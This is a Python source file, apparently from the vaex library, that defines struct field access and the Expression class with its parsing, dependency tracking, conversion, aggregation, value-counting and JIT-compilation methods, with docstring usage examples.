def __init__(self, expression):
self.expression = expression
self._array = self.expression.values
def __iter__(self):
for name in self.keys():
yield name
def __getitem__(self, key):
"""Return struct field by either field name (string) or index position (index).
In case of ambiguous field names, a `LookupError` is raised.
"""
self._assert_struct_dtype()
return self.get(key)
def __len__(self):
"""Return the number of struct fields contained in struct array.
"""
self._assert_struct_dtype()
return len(self._array.type)
def keys(self):
"""Return all field names contained in struct array.
:returns: list of field names.
Example:
>>> import vaex
>>> import pyarrow as pa
>>> array = pa.StructArray.from_arrays(arrays=[[1,2], ["a", "b"]], names=["col1", "col2"])
>>> df = vaex.from_arrays(array=array)
>>> df
# array
0 {'col1': 1, 'col2': 'a'}
1 {'col1': 2, 'col2': 'b'}
>>> df.array.struct.keys()
["col1", "col2"]
"""
self._assert_struct_dtype()
return [field.name for field in self._array.type]
def values(self):
"""Return all fields as vaex expressions.
:returns: list of vaex expressions corresponding to each field in struct.
Example:
>>> import vaex
>>> import pyarrow as pa
>>> array = pa.StructArray.from_arrays(arrays=[[1,2], ["a", "b"]], names=["col1", "col2"])
>>> df = vaex.from_arrays(array=array)
>>> df
# array
0 {'col1': 1, 'col2': 'a'}
1 {'col1': 2, 'col2': 'b'}
>>> df.array.struct.values()
[Expression = struct_get(array, 0)
Length: 2 dtype: int64 (expression)
-----------------------------------
0 1
1 2,
Expression = struct_get(array, 1)
Length: 2 dtype: string (expression)
------------------------------------
0 a
1 b]
"""
self._assert_struct_dtype()
return [self[i] for i in range(len(self))]
def items(self):
"""Return all fields with names along with corresponding vaex expressions.
:returns: list of tuples with field names and fields as vaex expressions.
Example:
>>> import vaex
>>> import pyarrow as pa
>>> array = pa.StructArray.from_arrays(arrays=[[1,2], ["a", "b"]], names=["col1", "col2"])
>>> df = vaex.from_arrays(array=array)
>>> df
# array
0 {'col1': 1, 'col2': 'a'}
1 {'col1': 2, 'col2': 'b'}
>>> df.array.struct.items()
[('col1',
Expression = struct_get(array, 0)
Length: 2 dtype: int64 (expression)
-----------------------------------
0 1
1 2),
('col2',
Expression = struct_get(array, 1)
Length: 2 dtype: string (expression)
------------------------------------
0 a
1 b)]
"""
self._assert_struct_dtype()
return list(zip(self.keys(), self.values()))
@property
def dtypes(self):
"""Return all field names along with corresponding types.
:returns: a pandas series with keys as index and types as values.
Example:
>>> import vaex
>>> import pyarrow as pa
>>> array = pa.StructArray.from_arrays(arrays=[[1,2], ["a", "b"]], names=["col1", "col2"])
>>> df = vaex.from_arrays(array=array)
>>> df
# array
0 {'col1': 1, 'col2': 'a'}
1 {'col1': 2, 'col2': 'b'}
>>> df.array.struct.dtypes
col1 int64
col2 string
dtype: object
"""
self._assert_struct_dtype()
dtypes = (field.type for field in self._array.type)
vaex_dtypes = [DataType(x) for x in dtypes]
return pd.Series(vaex_dtypes, index=self.keys())
def _assert_struct_dtype(self):
"""Ensure that struct operations are only called on valid struct dtype.
"""
from vaex.struct import assert_struct_dtype
assert_struct_dtype(self._array)
class Expression(with_metaclass(Meta)):
"""Expression class"""
def __init__(self, ds, expression, ast=None, _selection=False):
import vaex.dataframe
self.ds : vaex.dataframe.DataFrame = ds
assert not isinstance(ds, Expression)
if isinstance(expression, Expression):
expression = expression.expression
if expression is None and ast is None:
raise ValueError('Not both expression and the ast can be None')
self._ast = ast
self._expression = expression
self.df._expressions.append(weakref.ref(self))
self._ast_names = None
self._selection = _selection # selection have an extra scope
@property
def _label(self):
'''If a column name is not a valid identifier, the expression is df['long name']
This will return 'long name' in that case, otherwise simply the expression
'''
ast = self.ast
if isinstance(ast, expresso._ast.Subscript):
value = ast.slice.value
if isinstance(value, expresso.ast_Str):
return value.s
if isinstance(value, str): # py39+
return value
return self.expression
def fingerprint(self):
fp = vaex.cache.fingerprint(self.expression, self.df.fingerprint(dependencies=self.dependencies()))
return f'expression-{fp}'
def copy(self, df=None):
"""Efficiently copies an expression.
Expression objects have both a string and AST representation. Creating
the AST representation involves parsing the expression, which is expensive.
Using copy will deepcopy the AST when the expression was already parsed.
:param df: DataFrame for which the expression will be evaluated (self.df if None)
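Example (illustrative, following the other examples in this module):
>>> df = vaex.example()
>>> r = np.sqrt(df.data.x**2 + df.data.y**2)
>>> r_copy = r.copy()  # deep-copies the parsed AST if it already exists, avoiding a re-parse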
"""
# expression either has _expression or _ast not None
if df is None:
df = self.df
if self._expression is not None:
expression = Expression(df, self._expression)
if self._ast is not None:
expression._ast = copy.deepcopy(self._ast)
elif self._ast is not None:
expression = Expression(df, copy.deepcopy(self._ast))
if self._ast is not None:
expression._ast = self._ast
return expression
@property
def ast(self):
"""Returns the abstract syntax tree (AST) of the expression"""
if self._ast is None:
self._ast = expresso.parse_expression(self.expression)
return self._ast
@property
def ast_names(self):
if self._ast_names is None:
self._ast_names = expresso.names(self.ast)
return self._ast_names
@property
def _ast_slices(self):
return expresso.slices(self.ast)
@property
def expression(self):
if self._expression is None:
self._expression = expresso.node_to_string(self.ast)
return self._expression
@expression.setter
def expression(self, value):
# if we reassign to expression, we clear the ast cache
if value != self._expression:
self._expression = value
self._ast = None
def __bool__(self):
"""Cast expression to boolean. Only supports (<expr1> == <expr2> and <expr1> != <expr2>)
The main use case for this is to support assigning to traitlets. e.g.:
>>> bool(expr1 == expr2)
This will return True when expr1 and expr2 are exactly the same (in string representation). And similarly for:
>>> bool(expr1 != expr2)
All other cases will return True.
"""
# this is to make traitlets detect changes
import _ast
if isinstance(self.ast, _ast.Compare) and len(self.ast.ops) == 1 and isinstance(self.ast.ops[0], _ast.Eq):
return expresso.node_to_string(self.ast.left) == expresso.node_to_string(self.ast.comparators[0])
if isinstance(self.ast, _ast.Compare) and len(self.ast.ops) == 1 and isinstance(self.ast.ops[0], _ast.NotEq):
return expresso.node_to_string(self.ast.left) != expresso.node_to_string(self.ast.comparators[0])
return True
@property
def df(self):
# lets gradually move to using .df
return self.ds
@property
def dtype(self):
return self.df.data_type(self)
# TODO: remove this method?
def data_type(self, array_type=None, axis=0):
return self.df.data_type(self, axis=axis)
@property
def shape(self):
return self.df._shape_of(self)
@property
def ndim(self):
return 1 if self.dtype.is_list else len(self.df._shape_of(self))
def to_arrow(self, convert_to_native=False):
'''Convert to Apache Arrow array (will byteswap/copy if convert_to_native=True).'''
values = self.values
return vaex.array_types.to_arrow(values, convert_to_native=convert_to_native)
def __arrow_array__(self, type=None):
values = self.to_arrow()
return pa.array(values, type=type)
def to_numpy(self, strict=True):
"""Return a numpy representation of the data"""
values = self.values
return vaex.array_types.to_numpy(values, strict=strict)
def to_dask_array(self, chunks="auto"):
import dask.array as da
import uuid
dtype = self.dtype
chunks = da.core.normalize_chunks(chunks, shape=self.shape, dtype=dtype.numpy)
name = 'vaex-expression-%s' % str(uuid.uuid1())
def getitem(df, item):
assert len(item) == 1
item = item[0]
start, stop, step = item.start, item.stop, item.step
assert step in [None, 1]
return self.evaluate(start, stop, parallel=False)
if hasattr(da.core, "getem"):
dsk = da.core.getem(name, chunks, getitem=getitem, shape=self.shape, dtype=dtype.numpy)
dsk[name] = self
return da.Array(dsk, name, chunks, dtype=dtype.numpy)
else:
dsk = da.core.graph_from_arraylike(self, name=name, chunks=chunks, getitem=getitem, shape=self.shape, dtype=dtype.numpy)
return da.Array(dsk, name, chunks, dtype=dtype.numpy)
def to_pandas_series(self):
"""Return a pandas.Series representation of the expression.
Note: Pandas is likely to make a memory copy of the data.
"""
import pandas as pd
return pd.Series(self.values)
def __getitem__(self, slicer):
"""Provides row and optional field access (struct arrays) via bracket notation.
Examples:
>>> import vaex
>>> import pyarrow as pa
>>> array = pa.StructArray.from_arrays(arrays=[[1, 2, 3], ["a", "b", "c"]], names=["col1", "col2"])
>>> df = vaex.from_arrays(array=array, integer=[5, 6, 7])
>>> df
# array integer
0 {'col1': 1, 'col2': 'a'} 5
1 {'col1': 2, 'col2': 'b'} 6
2 {'col1': 3, 'col2': 'c'} 7
>>> df.integer[1:]
Expression = integer
Length: 2 dtype: int64 (column)
-------------------------------
0 6
1 7
>>> df.array[1:]
Expression = array
Length: 2 dtype: struct<col1: int64, col2: string> (column)
-----------------------------------------------------------
0 {'col1': 2, 'col2': 'b'}
1 {'col1': 3, 'col2': 'c'}
>>> df.array[:, "col1"]
Expression = struct_get(array, 'col1')
Length: 3 dtype: int64 (expression)
-----------------------------------
0 1
1 2
2 3
>>> df.array[1:, ["col1"]]
Expression = struct_project(array, ['col1'])
Length: 2 dtype: struct<col1: int64> (expression)
-------------------------------------------------
0 {'col1': 2}
1 {'col1': 3}
>>> df.array[1:, ["col2", "col1"]]
Expression = struct_project(array, ['col2', 'col1'])
Length: 2 dtype: struct<col2: string, col1: int64> (expression)
---------------------------------------------------------------
0 {'col2': 'b', 'col1': 2}
1 {'col2': 'c', 'col1': 3}
"""
if isinstance(slicer, slice):
indices = slicer
fields = None
elif isinstance(slicer, tuple) and len(slicer) == 2:
indices, fields = slicer
else:
raise NotImplementedError
if indices != slice(None):
expr = self.df[indices][self.expression]
else:
expr = self
if fields is None:
return expr
elif isinstance(fields, (int, str)):
if self.dtype.is_struct:
return expr.struct.get(fields)
elif self.ndim == 2:
if not isinstance(fields, int):
raise TypeError(f'Expected an integer, not {type(fields)}')
else:
return expr.getitem(fields)
else:
raise TypeError(f'Only getting struct fields or 2d columns supported')
elif isinstance(fields, (tuple, list)):
return expr.struct.project(fields)
else:
raise TypeError("Invalid type provided. Needs to be None, str or list/tuple.")
def __abs__(self):
"""Returns the absolute value of the expression"""
return self.abs()
@property
def dt(self):
"""Gives access to datetime operations via :py:class:`DateTime`"""
return DateTime(self)
@property
def td(self):
"""Gives access to timedelta operations via :py:class:`TimeDelta`"""
return TimeDelta(self)
@property
def str(self):
"""Gives access to string operations via :py:class:`StringOperations`"""
return StringOperations(self)
@property
def str_pandas(self):
"""Gives access to string operations via :py:class:`StringOperationsPandas` (using Pandas Series)"""
return StringOperationsPandas(self)
@property
def struct(self):
"""Gives access to struct operations via :py:class:`StructOperations`"""
return StructOperations(self)
@property
def values(self):
return self.evaluate()
def derivative(self, var, simplify=True):
var = _ensure_string_from_expression(var)
return self.__class__(self.ds, expresso.derivative(self.ast, var, simplify=simplify))
def expand(self, stop=[]):
"""Expand the expression such that no virtual columns occurs, only normal columns.
Example:
>>> df = vaex.example()
>>> r = np.sqrt(df.data.x**2 + df.data.y**2)
>>> r.expand().expression
'sqrt(((x ** 2) + (y ** 2)))'
"""
stop = _ensure_strings_from_expressions(stop)
def translate(id):
if id in self.ds.virtual_columns and id not in stop:
return self.ds.virtual_columns[id]
expr = expresso.translate(self.ast, translate)
return Expression(self.ds, expr)
def dependencies(self):
'''Get all dependencies of this expression, including ourselves'''
return self.variables(ourself=True)
def variables(self, ourself=False, expand_virtual=True, include_virtual=True):
"""Return a set of variables this expression depends on.
Example:
>>> df = vaex.example()
>>> r = np.sqrt(df.data.x**2 + df.data.y**2)
>>> r.variables()
{'x', 'y'}
"""
variables = set()
def record(varname):
# always do this for selection
if self._selection and self.df.has_selection(varname):
selection = self.df.get_selection(varname)
variables.update(selection.dependencies(self.df))
# do this recursively for virtual columns
if varname in self.ds.virtual_columns and varname not in variables:
if (include_virtual and (varname != self.expression)) or (varname == self.expression and ourself):
variables.add(varname)
if expand_virtual:
variables.update(self.df[self.df.virtual_columns[varname]].variables(ourself=include_virtual, include_virtual=include_virtual))
# we usually don't want to record ourself
elif varname != self.expression or ourself:
variables.add(varname)
expresso.translate(self.ast, record)
# df is a builtin, don't record it; if df is a column name, it will be collected as
# df['df']
variables -= {'df'}
for varname in self._ast_slices:
if varname in self.df.virtual_columns and varname not in variables:
if (include_virtual and (f"df['{varname}']" != self.expression)) or (f"df['{varname}']" == self.expression and ourself):
variables.add(varname)
if expand_virtual:
if varname in self.df.virtual_columns:
variables |= self.df[self.df.virtual_columns[varname]].variables(ourself=include_virtual, include_virtual=include_virtual)
elif f"df['{varname}']" != self.expression or ourself:
variables.add(varname)
return variables
def _graph(self):
"""Return a graph containing the dependencies of this expression
Structure is:
[<string expression>, <function name if callable>, <function object if callable>, [subgraph/dependencies, ....]]
"""
expression = self.expression
def walk(node):
if isinstance(node, six.string_types):
if node in self.ds.virtual_columns:
ex = Expression(self.ds, self.ds.virtual_columns[node])
return [node, None, None, [ex._graph()]]
else:
return node
else:
fname, node_repr, deps = node
if len(node_repr) > 30: # clip too long expressions
node_repr = node_repr[:26] + ' ....'
deps = [walk(dep) for dep in deps]
obj = self.ds.functions.get(fname)
# we don't want the wrapper, we want the underlying object
if isinstance(obj, Function):
obj = obj.f
if isinstance(obj, FunctionSerializablePickle):
obj = obj.f
return [node_repr, fname, obj, deps]
return walk(expresso._graph(expression))
def _graphviz(self, dot=None):
"""Return a graphviz.Digraph object with a graph of the expression"""
from graphviz import Graph, Digraph
node = self._graph()
dot = dot or Digraph(comment=self.expression)
def walk(node):
if isinstance(node, six.string_types):
dot.node(node, node)
return node, node
else:
node_repr, fname, fobj, deps = node
node_id = node_repr
dot.node(node_id, node_repr)
for dep in deps:
dep_id, dep = walk(dep)
dot.edge(node_id, dep_id)
return node_id, node
walk(node)
return dot
def __str__(self):
return self.expression
# def __array__(self, dtype=None):
# '''For casting to a numpy array
# Example:
# >>> np.array(ds.x**2)
# '''
# return self.ds.evaluate(self)
def tolist(self, i1=None, i2=None):
'''Short for expr.evaluate().tolist()'''
values = self.evaluate(i1=i1, i2=i2)
if isinstance(values, (pa.Array, pa.ChunkedArray)):
return values.to_pylist()
return values.tolist()
if not os.environ.get('VAEX_DEBUG', ''):
def __repr__(self):
return self._repr_plain_()
def _repr_plain_(self):
from .formatting import _format_value
def format(values):
for i in range(len(values)):
value = values[i]
yield _format_value(value)
colalign = ("right",) * 2
try:
N = len(self.ds)
if N <= PRINT_MAX_COUNT:
values = format(self.evaluate(0, N))
values = tabulate.tabulate([[i, k] for i, k in enumerate(values)], tablefmt='plain', colalign=colalign)
else:
values_head = format(self.evaluate(0, PRINT_MAX_COUNT//2))
values_tail = format(self.evaluate(N - PRINT_MAX_COUNT//2, N))
values_head = list(zip(range(PRINT_MAX_COUNT//2), values_head)) +\
list(zip(range(N - PRINT_MAX_COUNT//2, N), values_tail))
values = tabulate.tabulate([k for k in values_head], tablefmt='plain', colalign=colalign)
values = values.split('\n')
width = max(map(len, values))
separator = '\n' + '...'.center(width, ' ') + '\n'
values = "\n".join(values[:PRINT_MAX_COUNT//2]) + separator + "\n".join(values[PRINT_MAX_COUNT//2:]) + '\n'
except Exception as e:
values = 'Error evaluating: %r' % e
expression = self.expression
if len(expression) > 60:
expression = expression[:57] + '...'
info = 'Expression = ' + expression + '\n'
dtype = self.dtype
if self.expression in self.ds.virtual_columns:
state = "virtual column"
elif self.expression in self.ds.get_column_names(hidden=True):
state = "column"
else:
state = "expression"
line = 'Length: {:,} dtype: {} ({})\n'.format(len(self.ds), dtype, state)
info += line
info += '-' * (len(line)-1) + '\n'
info += values
return info
def count(self, binby=[], limits=None, shape=default_shape, selection=False, delay=False, edges=False, progress=None):
'''Shortcut for ds.count(expression, ...), see `Dataset.count`'''
kwargs = dict(locals())
del kwargs['self']
kwargs['expression'] = self.expression
return self.ds.count(**kwargs)
def sum(self, axis=None, binby=[], limits=None, shape=default_shape, selection=False, delay=False, progress=None):
'''Sum elements over given axis.
If no axis is given, it will sum over all axes.
For non list elements, this is a shortcut for ds.sum(expression, ...), see `Dataset.sum`.
>>> list_data = [1, 2, None], None, [], [1, 3, 4, 5]
>>> df = vaex.from_arrays(some_list=pa.array(list_data))
>>> df.some_list.sum().item() # will sum over all axes
16
>>> df.some_list.sum(axis=1).tolist() # sums the list elements
[3, None, 0, 13]
:param int axis: Axis over which to perform the summation (None will flatten arrays or lists)
'''
expression = self
if axis is None:
dtype = self.dtype
if dtype.is_list:
axis = [0]
while dtype.is_list:
axis.append(axis[-1] + 1)
dtype = dtype.value_type
elif self.ndim > 1:
axis = list(range(self.ndim))
else:
axis = [0]
elif not isinstance(axis, list):
axis = [axis]
axis = list(set(axis)) # remove repeated elements
dtype = self.dtype
if self.ndim > 1:
array_axes = axis.copy()
if 0 in array_axes:
array_axes.remove(0)
expression = expression.array_sum(axis=array_axes)
for i in array_axes:
axis.remove(i)
del i
del array_axes
elif 1 in axis:
if self.dtype.is_list:
expression = expression.list_sum()
if axis:
axis.remove(1)
else:
raise ValueError(f'axis=1 not supported for dtype={dtype}')
if axis and axis[0] != 0:
raise ValueError(f'Only axis 0 or 1 is supported')
if expression.ndim > 1:
raise ValueError(f'Cannot sum non-scalar (ndim={expression.ndim})')
if axis is None or 0 in axis:
kwargs = dict(locals())
del kwargs['self']
del kwargs['axis']
del kwargs['dtype']
kwargs['expression'] = expression.expression
return self.ds.sum(**kwargs)
else:
return expression
def mean(self, binby=[], limits=None, shape=default_shape, selection=False, delay=False, progress=None):
'''Shortcut for ds.mean(expression, ...), see `Dataset.mean`'''
kwargs = dict(locals())
del kwargs['self']
kwargs['expression'] = self.expression
return self.ds.mean(**kwargs)
def std(self, binby=[], limits=None, shape=default_shape, selection=False, delay=False, progress=None):
'''Shortcut for ds.std(expression, ...), see `Dataset.std`'''
kwargs = dict(locals())
del kwargs['self']
kwargs['expression'] = self.expression
return self.ds.std(**kwargs)
def var(self, binby=[], limits=None, shape=default_shape, selection=False, delay=False, progress=None):
'''Shortcut for ds.var(expression, ...), see `Dataset.var`'''
kwargs = dict(locals())
del kwargs['self']
kwargs['expression'] = self.expression
return self.ds.var(**kwargs)
def skew(self, binby=[], limits=None, shape=default_shape, selection=False, delay=False, progress=None):
'''Shortcut for df.skew(expression, ...), see `DataFrame.skew`'''
kwargs = dict(locals())
del kwargs['self']
kwargs['expression'] = self.expression
return self.df.skew(**kwargs)
def kurtosis(self, binby=[], limits=None, shape=default_shape, selection=False, delay=False, progress=None):
'''Shortcut for df.kurtosis(expression, ...), see `DataFrame.kurtosis`'''
kwargs = dict(locals())
del kwargs['self']
kwargs['expression'] = self.expression
return self.df.kurtosis(**kwargs)
def minmax(self, binby=[], limits=None, shape=default_shape, selection=False, delay=False, progress=None):
'''Shortcut for ds.minmax(expression, ...), see `Dataset.minmax`'''
kwargs = dict(locals())
del kwargs['self']
kwargs['expression'] = self.expression
return self.ds.minmax(**kwargs)
def min(self, binby=[], limits=None, shape=default_shape, selection=False, delay=False, progress=None):
'''Shortcut for ds.min(expression, ...), see `Dataset.min`'''
kwargs = dict(locals())
del kwargs['self']
kwargs['expression'] = self.expression
return self.ds.min(**kwargs)
def max(self, binby=[], limits=None, shape=default_shape, selection=False, delay=False, progress=None):
'''Shortcut for ds.max(expression, ...), see `Dataset.max`'''
kwargs = dict(locals())
del kwargs['self']
kwargs['expression'] = self.expression
return self.ds.max(**kwargs)
def nop(self):
"""Evaluates expression, and drop the result, usefull for benchmarking, since vaex is usually lazy"""
return self.ds.nop(self.expression)
@property
def transient(self):
"""If this expression is not transient (e.g. on disk) optimizations can be made"""
return self.expand().expression not in self.ds.columns
@property
def masked(self):
"""Alias to df.is_masked(expression)"""
return self.ds.is_masked(self.expression)
@docsubst
def value_counts(self, dropna=False, dropnan=False, dropmissing=False, ascending=False, progress=False, axis=None):
"""Computes counts of unique values.
WARNING:
* If the expression/column is not categorical, it will be converted on the fly
* dropna is False by default, it is True by default in pandas
:param dropna: {dropna}
:param dropnan: {dropnan}
:param dropmissing: {dropmissing}
:param ascending: when False (default) it will report the most frequently occurring item first
:param progress: {progress}
:param bool axis: Axis over which to determine the unique elements (None will flatten arrays or lists)
:returns: Pandas series containing the counts
"""
from pandas import Series
if axis is not None:
raise ValueError('only axis=None is supported')
if dropna:
dropnan = True
dropmissing = True
data_type = self.data_type()
data_type_item = self.data_type(axis=-1)
transient = self.transient or self.ds.filtered or self.ds.is_masked(self.expression)
if self.is_string() and not transient:
# string is a special case, only ColumnString are not transient
ar = self.ds.columns[self.expression]
if not isinstance(ar, ColumnString):
transient = True
counter_type = counter_type_from_dtype(data_type_item, transient)
counters = [None] * self.ds.executor.thread_pool.nthreads
def map(thread_index, i1, i2, selection_masks, blocks):
ar = blocks[0]
if len(ar) == 0:
return 0
if counters[thread_index] is None:
counters[thread_index] = counter_type(1)
if data_type.is_list and axis is None:
try:
ar = ar.values
except AttributeError: # pyarrow ChunkedArray
ar = ar.combine_chunks().values
if data_type_item.is_string:
ar = _to_string_sequence(ar)
else:
ar = vaex.array_types.to_numpy(ar)
if np.ma.isMaskedArray(ar):
mask = np.ma.getmaskarray(ar)
counters[thread_index].update(ar, mask)
else:
counters[thread_index].update(ar)
return 0
def reduce(a, b):
return a+b
progressbar = vaex.utils.progressbars(progress, title="value counts")
self.ds.map_reduce(map, reduce, [self.expression], delay=False, progress=progressbar, name='value_counts', info=True, to_numpy=False)
counters = [k for k in counters if k is not None]
counter = counters[0]
for other in counters[1:]:
counter.merge(other)
if data_type_item.is_object:
# for dtype=object we use the old interface
# since we don't care about multithreading (cannot release the GIL)
key_values = counter.extract()
keys = list(key_values.keys())
counts = list(key_values.values())
if counter.has_nan and not dropnan:
keys = [np.nan] + keys
counts = [counter.nan_count] + counts
if counter.has_null and not dropmissing:
keys = [None] + keys
counts = [counter.null_count] + counts
if dropmissing and None in keys:
# we still can have a None in the values
index = keys.index(None)
keys.pop(index)
counts.pop(index)
counts = np.array(counts)
keys = np.array(keys)
else:
keys = counter.key_array()
counts = counter.counts()
if isinstance(keys, (vaex.strings.StringList32, vaex.strings.StringList64)):
keys = vaex.strings.to_arrow(keys)
deletes = []
if counter.has_nan:
null_offset = 1
else:
null_offset = 0
if dropmissing and counter.has_null:
deletes.append(counter.null_index)
if dropnan and counter.has_nan:
deletes.append(counter.nan_index)
if vaex.array_types.is_arrow_array(keys):
indices = np.delete(np.arange(len(keys)), deletes)
keys = keys.take(indices)
else:
keys = np.delete(keys, deletes)
if not dropmissing and counter.has_null:
mask = np.zeros(len(keys), dtype=np.uint8)
mask[null_offset] = 1
keys = np.ma.array(keys, mask=mask)
counts = np.delete(counts, deletes)
order = np.argsort(counts)
if not ascending:
order = order[::-1]
counts = counts[order]
keys = keys.take(order)
keys = keys.tolist()
if None in keys:
index = keys.index(None)
keys.pop(index)
keys = ["missing"] + keys
counts = counts.tolist()
count_null = counts.pop(index)
counts = [count_null] + counts
return Series(counts, index=keys)
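# Illustrative usage sketch (not part of the original source): value_counts on a
# small in-memory DataFrame; the column name 'color' is hypothetical.
#
# >>> import vaex
# >>> df = vaex.from_arrays(color=['red', 'red', 'blue'])
# >>> df.color.value_counts()   # pandas Series, most frequent value first
# red     2
# blue    1
# dtype: int64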
@docsubst
def unique(self, dropna=False, dropnan=False, dropmissing=False, selection=None, axis=None, limit=None, limit_raise=True, array_type='list', progress=None, delay=False):
"""Returns all unique values.
:param dropna: {dropna}
:param dropnan: {dropnan}
:param dropmissing: {dropmissing}
:param selection: {selection}
:param bool axis: Axis over which to determine the unique elements (None will flatten arrays or lists)
:param int limit: {limit}
:param bool limit_raise: {limit_raise}
:param bool array_type: {array_type}
:param progress: {progress}
:param bool delay: {delay}
"""
return self.ds.unique(self, dropna=dropna, dropnan=dropnan, dropmissing=dropmissing, selection=selection, array_type=array_type, axis=axis, limit=limit, limit_raise=limit_raise, progress=progress, delay=delay)
@docsubst
def nunique(self, dropna=False, dropnan=False, dropmissing=False, selection=None, axis=None, limit=None, limit_raise=True, progress=None, delay=False):
"""Counts number of unique values, i.e. `len(df.x.unique()) == df.x.nunique()`.
:param dropna: {dropna}
:param dropnan: {dropnan}
:param dropmissing: {dropmissing}
:param selection: {selection}
:param bool axis: Axis over which to determine the unique elements (None will flatten arrays or lists)
:param int limit: {limit}
:param bool limit_raise: {limit_raise}
:param progress: {progress}
:param bool delay: {delay}
"""
def key_function():
fp = vaex.cache.fingerprint(self.fingerprint(), dropna, dropnan, dropmissing, selection, axis, limit)
return f'nunique-{fp}'
@vaex.cache._memoize(key_function=key_function, delay=delay)
def f():
value = self.unique(dropna=dropna, dropnan=dropnan, dropmissing=dropmissing, selection=selection, axis=axis, limit=limit, limit_raise=limit_raise, array_type=None, progress=progress, delay=delay)
if delay:
return value.then(len)
else:
return len(value)
return f()
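# Illustrative usage sketch (not part of the original source): unique vs nunique
# on a hypothetical integer column; the order of unique values is not guaranteed.
#
# >>> import vaex
# >>> df = vaex.from_arrays(x=[1, 2, 2, 3])
# >>> sorted(df.x.unique())
# [1, 2, 3]
# >>> df.x.nunique()
# 3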
def countna(self):
"""Returns the number of Not Availiable (N/A) values in the expression.
This includes missing values and np.nan values.
"""
return self.isna().sum().item() # so the output is int, not array
def countnan(self):
"""Returns the number of NaN values in the expression."""
return self.isnan().sum().item() # so the output is int, not array
def countmissing(self):
"""Returns the number of missing values in the expression."""
return self.ismissing().sum().item() # so the output is int, not array
def evaluate(self, i1=None, i2=None, out=None, selection=None, parallel=True, array_type=None):
return self.ds.evaluate(self, i1, i2, out=out, selection=selection, array_type=array_type, parallel=parallel)
# TODO: it is not so elegant we need to have a custom version of this
# it now also misses the docstring, reconsider how the meta class auto
# adds this method
def fillna(self, value, fill_nan=True, fill_masked=True):
expression = self._upcast_for(value)
return self.ds.func.fillna(expression, value=value, fill_nan=fill_nan, fill_masked=fill_masked)
def _upcast_for(self, value):
# make sure the dtype is compatible with value
expression = self
dtype = self.dtype
if dtype == int:
required_dtype = vaex.utils.required_dtype_for_int(value, signed=dtype.is_signed)
if required_dtype.itemsize > dtype.numpy.itemsize:
expression = self.astype(str(required_dtype))
return expression
def fillmissing(self, value):
'''Returns an array where missing values are replaced by value.
See `ismissing` for the definition of missing values.
'''
expression = self._upcast_for(value)
return self.df.func.fillmissing(expression, value=value)
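# Illustrative sketch (not part of the original source): fillmissing upcasts the
# expression when the fill value does not fit the original integer dtype. The
# column name and values below are hypothetical.
#
# >>> import numpy as np
# >>> import vaex
# >>> x = np.ma.array([1, 2, 3], mask=[0, 1, 0], dtype=np.int8)
# >>> df = vaex.from_arrays(x=x)
# >>> df.x.fillmissing(999).tolist()  # 999 does not fit int8, so the expression is upcast first
# [1, 999, 3]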
def clip(self, lower=None, upper=None):
return self.ds.func.clip(self, lower, upper)
def jit_metal(self, verbose=False):
from .metal import FunctionSerializableMetal
f = FunctionSerializableMetal.build(self.expression, df=self.ds, verbose=verbose, compile=self.ds.is_local())
function = self.ds.add_function('_jit', f, unique=True)
return function(*f.arguments)
def jit_numba(self, verbose=False):
f = FunctionSerializableNumba.build(self.expression, df=self.ds, verbose=verbose, compile=self.ds.is_local())
function = self.ds.add_function('_jit', f, unique=True)
return function(*f.arguments)
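# Illustrative sketch (not part of the original source): JIT-compiling a virtual
# column with numba. Assumes numba is installed; the column names are hypothetical.
#
# >>> import vaex
# >>> df = vaex.example()
# >>> df['r'] = (df.x**2 + df.y**2)**0.5
# >>> df['r_jit'] = df.r.jit_numba()   # same values, evaluated through a numba ufunc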
def jit_cuda(self, verbose=False):
f = FunctionSerializableCuda.build(self.expression, df=self.ds, verbose=verbose, compile=self.ds.is_local())
function = self.ds.add_function('_jit', f, unique=True)
return function(*f.arguments)
def jit_pythran(self, verbose=False):
import logging
logger = logging.getLogger('pythran')
log_level = logger.getEffectiveLevel()
try:
if not verbose:
logger.setLevel(logging.ERROR)
import pythran
import imp
import hashlib
# self._import_all(module)
names = []
funcs = set(expression_namespace.keys())
expression = self.expression
if expression in self.ds.virtual_columns:
expression = self.ds.virtual_columns[self.expression]
all_vars = self.ds.get_column_names(virtual=True, strings=True, hidden=True) + list(self.ds.variables.keys())
vaex.expresso.validate_expression(expression, all_vars, funcs, names)
names = list(set(names))
types = ", ".join(str(self.ds.data_type(name)) + "[]" for name in names)
argstring = ", ".join(names)
code = '''
from numpy import *
#pythran export f({2})
def f({0}):
return {1}'''.format(argstring, expression, types)
if verbose:
print("generated code")
print(code)
m = hashlib.md5()
m.update(code.encode('utf-8'))
module_name = "pythranized_" + m.hexdigest()
# print(m.hexdigest())
module_path = pythran.compile_pythrancode(module_name, code, extra_compile_args=["-DBOOST_SIMD", "-march=native"] + [] if verbose else ["-w"])
module = imp.load_dynamic(module_name, module_path)
function_name = "f_" + m.hexdigest()
function = self.ds.add_function(function_name, module.f, unique=True)
return Expression(self.ds, "{0}({1})".format(function.name, argstring))
finally:
logger.setLevel(log_level)
def _rename(self, old, new, inplace=False):
expression = self if inplace else self.copy()
if old in expression.ast_names:
for node in expression.ast_names[old]:
node.id = new
expression._ast_names[new] = expression._ast_names.pop(old)
slices = expression._ast_slices
if old in slices:
for node in slices[old]:
if node.value.id == 'df' and isinstance(node.slice.value, ast.Str):
node.slice.value.s = new
else: # py39
node.slice.value = new
expression._expression = None # resets the cached string representation
return expression
def astype(self, data_type):
if vaex.array_types.is_string_type(data_type) or data_type == str:
return self.ds.func.astype(self, 'str')
else:
return self.ds.func.astype(self, str(data_type))
def isin(self, values, use_hashmap=True):
"""Lazily tests if each value in the expression is present in values.
:param values: List/array of values to check
:param use_hashmap: use a hashmap or not (especially faster when values contains many elements)
:return: :class:`Expression` with the lazy expression.
"""
if self.df.is_category(self) and self.df._future_behaviour:
labels = self.df.category_labels(self.expression)
indices = []
for value in values:
if value not in labels:
pass
else:
indices.append(labels.index(value))
indices = np.array(indices, dtype=self.index_values().dtype.numpy)
return self.index_values().isin(indices, use_hashmap=use_hashmap)
if self.is_string():
values = pa.array(values, type=pa.large_string())
else:
# ensure that values are the same dtype as the expression (otherwise the set downcasts at the C++ level during execution)
values = np.array(values, dtype=self.dtype.numpy)
if use_hashmap:
# easiest way to create a set is using the vaex dataframe
df_values = vaex.from_arrays(x=values)
ordered_set = df_values._set(df_values.x)
var = self.df.add_variable('var_isin_ordered_set', ordered_set, unique=True)
return self.df['isin_set(%s, %s)' % (self, var)]
else:
var = self.df.add_variable('isin_values', values, unique=True)
return self.df['isin(%s, %s)' % (self, var)]
